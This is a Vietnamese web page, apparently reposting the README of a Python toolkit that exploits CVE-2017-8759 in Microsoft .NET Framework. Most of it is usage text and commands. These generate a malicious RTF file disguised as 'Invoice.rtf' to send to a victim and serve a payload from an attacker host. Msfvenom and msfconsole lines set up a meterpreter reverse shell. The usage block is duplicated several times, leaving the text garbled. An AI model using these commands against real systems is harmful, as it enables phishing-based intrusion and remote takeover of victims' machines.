Bộ công cụ khai thác CVE-2017-8759 - v1.0 Bộ công cụ khai thác CVE-2017-8759 - v1.0 là một tập lệnh python hữu ích, cung cấp cho các nhà ngh...
Bộ công cụ khai thác CVE-2017-8759 - v1.0
Bộ công cụ khai thác CVE-2017-8759 - v1.0 là một tập lệnh python hữu ích, cung cấp cho các nhà nghiên cứu về pentesters và an ninh một cách nhanh chóng và hiệu quả để thử nghiệm Microsoft .NET Framework RCE. Nó có thể tạo ra một file RTF độc hại và đưa ra Metasploit / meterpreter / một payload khác cho nạn nhân mà không có bất kỳ cấu hình phức tạp nào.
Khước từ
Chương trình này chỉ dành cho mục đích giáo dục. Không sử dụng nó mà không được phép. Khước từ thông thường được áp dụng, đặc biệt là tôi (bhdresh) không chịu trách nhiệm đối với bất kỳ thiệt hại do việc sử dụng trực tiếp hoặc gián tiếp thông tin hoặc chức năng được cung cấp bởi các chương trình này. Tác giả hoặc nhà cung cấp dịch vụ Internet không chịu trách nhiệm về nội dung hoặc lạm dụng các chương trình này hoặc bất kỳ dẫn xuất nào của chúng. Bằng cách sử dụng chương trình này bạn chấp nhận thực tế là bất kỳ thiệt hại (dataloss, hệ thống sụp đổ, hệ thống compromise, vv) gây ra bởi việc sử dụng các chương trình này không phải là trách nhiệm của bhdresh.
Ghi chú phát hành:
Giới thiệu các tính năng sau cho kịch bản
- Tạo tệp tin độc hại RTF
- Chế độ khai thác cho tệp RTF được tạo
Download
git clone https://github.com/bhdresh/CVE-2017-8759.git
git clone https://github.com/bhdresh/CVE-2017-8759.git
Usage
# python cve-2017-8759_toolkit.py -h# python cve-2017-8759_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE)
Modes:
-M gen Generate Malicious file only
Generate malicious RTF/PPSX file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.txt> Path of remote txt file. Normally, this should be a domain or IP where this tool is running. For example, http://attackerip.com/test.txt (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation: -p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Specify local path of an executable file / meterpreter shell / payload.
Example1) Generate malicious RTF file
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x “use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run”
3) Start toolkit in exploit mode to deliver local payload
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h# python cve-2017-8759_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE)
Modes:
-M gen Generate Malicious file only
Generate malicious RTF/PPSX file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.txt> Path of remote txt file. Normally, this should be a domain or IP where this tool is running. For example, http://attackerip.com/test.txt (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation: -p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Specify local path of an executable file / meterpreter shell / payload.
This is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE)
Modes:
-M gen Generate Malicious file only
Generate malicious RTF/PPSX file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.txt> Path of remote txt file. Normally, this should be a domain or IP where this tool is running. For example, http://attackerip.com/test.txt (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation: -p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Specify local path of an executable file / meterpreter shell / payload.
1) Generate malicious RTF file
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x “use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run”
3) Start toolkit in exploit mode to deliver local payload
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x “use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run”
3) Start toolkit in exploit mode to deliver local payload
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
COMMENTS